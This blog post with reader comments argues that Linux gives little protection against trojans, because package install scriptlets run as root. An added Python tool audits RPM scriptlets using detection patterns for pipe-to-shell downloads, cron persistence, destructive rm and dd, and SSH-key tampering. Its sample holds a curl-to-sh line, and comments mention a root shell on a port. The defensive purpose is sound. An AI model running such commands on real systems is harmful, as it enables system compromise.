On Linux security

Well, I was about to go to bed, but I can’t sleep till I get this written.

This was prompted by yet another comment thread in which people seem to believe Linux has some kind of special sauce that keeps them super-safe from malware.

The problem is, no, no it doesn’t. In practical respects, from the point of view of the individual end-user, a typical modern Linux system is only marginally more ‘safe’ from malware ‘attacks’ than a typical modern Windows system.

There are some things many people misunderstand that it’s important to understand. One: most ‘malware’ on Windows, these days, is pretty simple. The majority of it falls into the category known as a trojan, or trojan horse. What this means is that it doesn’t use some sort of clever exploitation of a security vulnerability in the operating system in order to propagate itself without human intervention. No, it’s much more dull. Most malware just works by getting the victims to infect themselves. Why bother going to all that trouble to exploit a security vulnerability that’ll probably be patched in a month when you can just write your nasty pop-up ad spawning application, say it’s a porn video or a poker game or a bleeding fart noise generator, and slap a few Google ads on some dodgy porn sites? This is how most modern adware works. It gets run because naive users run it, not by exploiting intrinsic vulnerabilities in the operating system.

Two, most of the much-vaunted Linux / Unix ‘security measures’ have very little relevance to your average desktop Linux user. The whole Linux security model is designed on the basis of a multi-user system. The intent is essentially that every user be allowed to do exactly what the hell they want in their own environment – and only in their own environment. And this is done, in general, very well (though there’s usually at least a few unpatched privilege escalation vulnerabilities in the wild – still, never mind). But you have to realize the implications of this.

If you’re in a proper multi-user environment – a single system (however the hardware is set up) with dozens of unprivileged user accounts, and a system administrator – it’s a godsend. For the administrator, and all the smart users. But it does nothing for the dumb users. Why? Well, think about it. The point is that nasty code can only screw up an individual user’s own stuff – basically, his/her home directory. So no other users are affected, and the system administrator can easily deal with the situation. This is what most Linux / Unix security is about.

So, think through the implications. If you’re Joe Dumb User and you just ran a trojan, none of this helps you a jot. Why? Because all the stuff you care about lives…in your user environment. Sure, it’s great to know that Jane Smart User and the BOFH can still truck along hunky dory, but there’s nothing at all to stop the trojan you just ran from popping up several zillion ads on your desktop. Or opening a browser to a selection of the finest in erotic entertainment sites, just as your boss walks in. Or wiping out all your precious files. Because they’re all stored in your flipping home directory, where any process running with your user privileges can do whatever the hell it likes.

Think a little further. If you run Linux on your desktop, you probably don’t run a true multi-user environment. Again, the whole concept of multi-user security does stuff all for you. If you run a trojan, it can annoy you as much as it likes, and kill all the data you care about. Yes, multi-user security prevents it doing anything to any system-wide files. But, so what? There’s very little you actually care about stored in /usr or /etc, is there? All your contacts, presentations and the fifth draft of your Next Great American Novel all live in /home/yourusername, where the trojan can do whatever the heck it likes to them.

Three, and this is the big one, 99% of desktop Linux users run completely arbitrary code as root, on at least a semi-regular basis.

Yes, really, they (you) do. Why? Well, think about what happens when you install a package. The installation process runs as root. And it runs utterly arbitrary code. When you install an RPM package, its %pre and %post scriptlets (and %preun and %postun when you remove it) are run with root privileges. Those scriptlets can be, well, anything at all: a shell script by default, though a package can name whatever interpreter it likes. DEB packages have the equivalent in their maintainer scripts (preinst, postinst, prerm, postrm), ebuilds have pkg_postinst and friends, and every other form of package management has something of the kind. Every general-purpose package manager needs it: a package that has to create a service account, register a daemon or rebuild a cache has to run code at install time, and nothing about the package format limits what that code does.

And, shout out if you only ever install properly signed packages from your distribution’s official repositories.

…quiet room, huh?

Just about everyone has installed a package for Some Kewl Application from some random third party website somewhere. Heck, this is a third-party website and I throw up packages for people all the time. When you go to www.mycoollinuxsite.com and install a package for a wireless card driver or a poker game or whatever the crap it is – congratulations, you just ran completely arbitrary code as root. You just did exactly the same thing any Windows-using clown who installs some poker game from www.mycoolwindowssite.com did. You don’t have a single iota more “protection” or “security” than the Windows-using clown. If whoever made that package – and you don’t have a clue who it was – wanted to own your system, they just did. Good job, sport.
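One concrete thing you can do about this, before you type the root password, is dump the package’s scriptlets and actually read them. What follows is an added example, not code from the original post: a small Python tool that parses the text `rpm -qp --scripts some-package.rpm` prints, splits it into the individual scriptlets, and flags the lines a reviewer would want to look at twice (pipe-to-shell downloads, cron entries, rm on /, dd onto a block device, setuid bits, and so on). The sample output it runs on is constructed for the example; the package name coolapp and the helper path under /usr/lib/coolapp are made up, and the www.mycoollinuxsite.com URL is the one used in the post.

```python
#!/usr/bin/env python3
"""Review the scriptlets of an RPM before letting them run as root.

Added example, not part of the original post. It reads the output of
`rpm -qp --scripts <pkg>.rpm` (from a saved file, stdin, or by running
rpm itself), splits it into the %pre/%post/%preun/%postun scriptlets and
flags lines that deserve a close look. A flag is a reason to read the
scriptlet, not proof of malice: `/sbin/ldconfig` is in thousands of
perfectly benign %post scriptlets.
"""
import re
import subprocess
import sys

# rpm prints either "postinstall scriptlet (using /bin/sh):" followed by
# the script body, or "postinstall program: /sbin/ldconfig" when the
# scriptlet is just a program to execute with no inline body.
SCRIPTLET_RE = re.compile(r"^(\w+) scriptlet \(using (\S+)\):$")
PROGRAM_RE = re.compile(r"^(\w+) program: (.+)$")

# (label, pattern) heuristics for things a third-party scriptlet should
# rarely need to do. Tune to taste; a false positive just costs a read.
SUSPICIOUS = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("cron persistence", re.compile(r"\bcrontab\b|/etc/cron\.")),
    ("rm on the root directory", re.compile(r"\brm\s+(-[\w-]+\s+)*/(\s|$)")),
    ("raw write to a block device", re.compile(r"\bdd\b.*\bof=/dev/")),
    ("setuid/special-bit chmod",
     re.compile(r"\bchmod\s+(-\S+\s+)*([ugoa]*\+\w*s|[0-7]?[1-7][0-7]{3})\b")),
    ("touches ld.so.preload, sudoers or SSH keys",
     re.compile(r"/etc/ld\.so\.preload|/etc/sudoers|authorized_keys")),
    ("decoded or eval'd payload", re.compile(r"\bbase64\s+(-d|--decode)\b|\beval\b")),
    ("network listener", re.compile(r"\b(nc|ncat|netcat)\b.*\s-\w*l|/etc/xinetd\.d/")),
]


def parse_scriptlets(text):
    """Split `rpm -qp --scripts` output into {name: {"interpreter", "body"}}.

    `body` is a list of lines; it is empty for "program:" entries.
    """
    scriptlets = {}
    current = None
    for line in text.splitlines():
        m = SCRIPTLET_RE.match(line)
        if m:
            current = m.group(1)
            scriptlets[current] = {"interpreter": m.group(2), "body": []}
            continue
        m = PROGRAM_RE.match(line)
        if m:
            scriptlets[m.group(1)] = {"interpreter": m.group(2), "body": []}
            current = None
            continue
        if current is not None:
            scriptlets[current]["body"].append(line)
    # rpm leaves a blank line after each body; drop trailing blanks.
    for s in scriptlets.values():
        while s["body"] and not s["body"][-1].strip():
            s["body"].pop()
    return scriptlets


def audit(text):
    """Return [(scriptlet, line_no, label, line)] for every flagged line."""
    findings = []
    for name, s in parse_scriptlets(text).items():
        for line_no, line in enumerate(s["body"], start=1):
            for label, pattern in SUSPICIOUS:
                if pattern.search(line):
                    findings.append((name, line_no, label, line.strip()))
    return findings


# Constructed sample of `rpm -qp --scripts` output for a made-up third-party
# package (coolapp and its helper path are invented; the URL is the one the
# post uses). Two of the postinstall lines are exactly what to stop on.
SAMPLE_OUTPUT = """\
preinstall scriptlet (using /bin/sh):
getent group coolapp >/dev/null || groupadd -r coolapp

postinstall scriptlet (using /bin/sh):
/sbin/ldconfig
echo '*/10 * * * * root /usr/lib/coolapp/helper' > /etc/cron.d/coolapp
curl -s http://www.mycoollinuxsite.com/update.sh | sh

postuninstall program: /sbin/ldconfig
"""


def scriptlets_for_package(path):
    """Ask rpm for the scriptlets of an .rpm on disk (rpm must be installed)."""
    proc = subprocess.run(["rpm", "-qp", "--scripts", path],
                          check=True, capture_output=True, text=True)
    return proc.stdout


def main(argv):
    if len(argv) > 1 and argv[1].endswith(".rpm"):
        text = scriptlets_for_package(argv[1])
    elif len(argv) > 1:                      # a saved copy of rpm's output
        with open(argv[1], encoding="utf-8") as fh:
            text = fh.read()
    elif not sys.stdin.isatty():
        text = sys.stdin.read()
    else:
        text = SAMPLE_OUTPUT
    findings = audit(text)
    for name, line_no, label, line in findings:
        print(f"{name} line {line_no}: {label}: {line}")
    return 1 if findings else 0             # non-zero so a wrapper can refuse to install


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Save it as, say, rpm-scriptlet-audit.py (the filename is mine) and run it against a package on a box with rpm installed, or pipe saved `rpm -qp --scripts` output into it; with no argument it runs on the built-in sample and exits 1, because two postinstall lines get flagged. Reading the scriptlets is the complement to checking the signature: `rpm -K some-package.rpm` (`rpm --checksig`) tells you whether the package is signed by a key you have imported, and the scriptlet dump tells you what you are about to run as root if you say yes anyway. Neither catches a malicious payload hidden in the installed binaries themselves, which is the point of the post: once it is installed and you run it, it has your data.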

I’m not saying this to be negative about the importance of security or how well security is managed on Linux. Security is vital, and Linux distributions generally achieve their security goals rather well. The point is a general one. As long as an operating system lets the user run arbitrary code, it’s always going to be possible for a trojan to do whatever it likes to all the data that user cares about. As long as an operating system wants to make it relatively easy to install applications, it’s always going to be possible for a trojan to do whatever the hell it likes to any system, if someone chooses to install it. There is no security measure against that. The only operating system that can be ‘secure’ against this type of attack is one which is very locked down, and does not allow you to install or run arbitrary code. Like a restricted cellphone operating system. That’s fine, but it’s not what people want on their computers.

It’s really important that everyone who owns a computer understands this. Your computer is not magic. It cannot protect you from malicious code if you choose to run that code, no matter whether your operating system is Windows, Linux, OS X, FreeBSD or bloody BeOS. Dan says that data you keep in just one place is obviously data you don’t care about. I’d add that data you keep on a system on which you run arbitrary code, and nowhere else, is also obviously data you don’t care about.

Most people are not willing to accept the inconvenience that comes with only ever installing code that is either a) 100% provably provided by a person or company you trust implicitly, or b) code you’ve examined every line of yourself. And that’s fine. But if you’re in this majority, you have to accept that the danger of trojan-type malware is one that can never be designed out by an operating system, and don’t be lulled into a false sense of security by the ‘Linux is invincible’ crowd. Yes, Linux is a properly multi-user operating system and secure from that perspective, in most implementations. Yes, Linux is generally quite well-secured against true ‘viruses’ – malicious code that is run without explicit user intervention. No, it is not magically safe against malicious code unwittingly run by the operator. It can never be.

The bottom line – I could publish a package along with this post which, after you double-clicked on it, entered your root password, and said “yes” to “the package is not signed, install it anyway?”, would zero out your hard disk. I could, by writing this post differently, probably convince quite a lot of people to install said package. Just because it (to my knowledge) hasn’t happened yet, doesn’t mean it can’t. Be careful what you run.

14 Responses

  1. misc, January 20, 2009 at 2:15 am

    I don’t agree, it already happened :)
    I know some guy in some 3-letter organisation with a penguin with a gun who told a user to install an xinetd config file that was running bash as root on port 5000 :)

  2. vfmmeo, January 20, 2009 at 5:09 am

    Yes!

    Lately we had a little discussion about security on Blogdrake, and my opinion is exactly the same as yours: the key component of any kind of security infrastructure in a desktop system is located between the keyboard and the chair.

    There are no more or less secure operating systems (in general terms), there are more or less cautious and smart computer users.

    It’s exactly the same, a double-click on “halleberrynudexxxscreensaver.exe” or “halleberrynudexxxscreensaver.rpm” (or “.deb”), next -> next -> next… “Hey! Where’s Halle?”

  3. glyj, January 20, 2009 at 6:11 am

    In fact, from that point of view, Windows is more secure than Linux if programs like Norton are installed. Antivirus and firewalls are quite old on Windows platforms :-D : they have had time to improve the tools.
    I read an article about this in an excellent magazine called MISC (it’s a French one); they performed several tests on several platforms and presented the methods to detect suspicious behaviours on the system… (with plenty of maths & algorithmics….)

    The introduction was something like: “we managed to break ALL the systems we tested (including OpenBSD, Linux…)” and “but some were harder to break…”

    One of the best ones was Windows with antivirus & firewall…

    regards,
    glyj

  4. glyj, January 20, 2009 at 8:58 am

    I forgot a link to MISC: http://www.miscmag.com/

  5. Dark_Schneider971, January 20, 2009 at 9:56 am

    You are 100% right Adam.

    In fact the strength of Linux is the fact that … it’s not easy to install third-party applications! Indeed, to install third-party applications you have to deal with several issues: package format (TGZ vs RPM vs DEB), API/library version issues, compatibility issues, possibly needing to know the root password.

    So one of the main weaknesses of Linux in being easy to use for the mass consumer market is in fact also what allows Linux to be less targeted by malware. When everybody is running Ubuntu with full sudo power for the first user, then we will have the same issues as Windows users ;-)

    SELinux/AppArmor may help, but most of the time only for known applications, as you can provide rules saying that application X is allowed to do this, but not allowed to do that. But for a third-party application? As you don’t know, you will let the application do whatever it wants, and then it can just open an unprivileged port and listen or send information …

    The only ways to be protected against these kinds of issues are:
    - monitor changes to critical system configuration files or binaries (chkrootkit for example)

    - prevent unknown or unwanted applications from communicating with the outside world with a firewall (however at one point users will just answer yes to everything).

    - monitor system activity for abnormal behaviour … in short, running an AntiVirus/AntiTrojan/AntiMalware …

    - or easier: only install packages from trusted sources. However, is Mandriva checking all the code in all of its packages? I don’t think so. It’s easy to become the packager for a distribution, doing a good job at the beginning, and when you are ready, add some subtle change that will allow you to install a rootkit or trojan on the users’ computers. And you don’t even need to do an “rm -fr /” right after the package installation. Just edit root’s crontab or put a file in /etc/cron.monthly or cron.yearly.

  6. boklm, January 20, 2009 at 10:53 am

    I agree with what you said, but I think there is still a reason why it’s much easier to create a virus on Windows:
    - On Windows the usual way to install software is to use Google and download it from a random web site. And some of those web sites are created by people who happen to have a virus on their computer.
    - On Linux you use the package manager.
    - On Windows, because you have to download programs yourself, people often keep executable files in some folders on their hard drive; a few months later they burn them to a CD, and use them on another computer or give them to their friends. A virus infecting all executables on a computer can easily move to another computer this way.
    - On Linux everything is available in the package repository. Keeping a collection of packages on your hard drive is not very useful, so most people don’t do it.

  7. vfmmeo, January 21, 2009 at 12:19 am

    @boklm

    “- On Linux you use the package manager.”

    That’s not always true. That’s the point. If your distro hasn’t packaged the software, if the proprietary driver isn’t available, if you’re new to Linux and all you know how to do is the Windows way…

    And what’s the difference (again) between “halleberrynude.rpm” (or .deb) and “halleberrynude.exe”? You only need a double-click and a root password.

  8. boklm, January 21, 2009 at 1:56 am

    @vfmmeo: yes, you can also install software manually on Linux, but that’s not what you do most of the time. On Windows that’s what you have to do most of the time because there is no other way. That’s the difference.

  9. Dark_Schneider971, January 21, 2009 at 2:44 am

    boklm> Sure, but it’s also because on Linux we are not used to installing third-party software. But when there is a mass market for Linux, you will have more third-party software (i.e. proprietary software) that people will have to install themselves manually, as some may not be packaged by the distro. Think of some games, Photoshop, iTunes, etc…. OK, we have near equivalents, but in the end, it’s the user who makes the decision.

  10. Dark_Schneider971, January 21, 2009 at 2:45 am

    adamw> I wrote a more complete follow-up on my blog: http://linux-wizard.net/blog-follow_up__on_linux_security-250.html

  11. vfmmeo, January 21, 2009 at 5:13 am

    @Dark:

    That’s the key!

  12. Boycott Novell » IRC: #boycottnovell @ FreeNode: January 21st, 2009 - Part 1

    [...] AdamW is still insisting that Linux is not secure (et tu, Adam?): http://www.happyassassin.net/2009/0… [...]

  13. tech78, February 2, 2009 at 12:42 pm

    As a support tech who’s cleaned up more than his share of virus & malware infected Windows machines, I’ve seen nothing comparable to the “drive-by” vulnerabilities posed by ActiveX scripting. I know Java and JavaScript come close, but still nothing like the gaping hole provided by the Internet Explorer/ActiveX combo from what I see in the field.
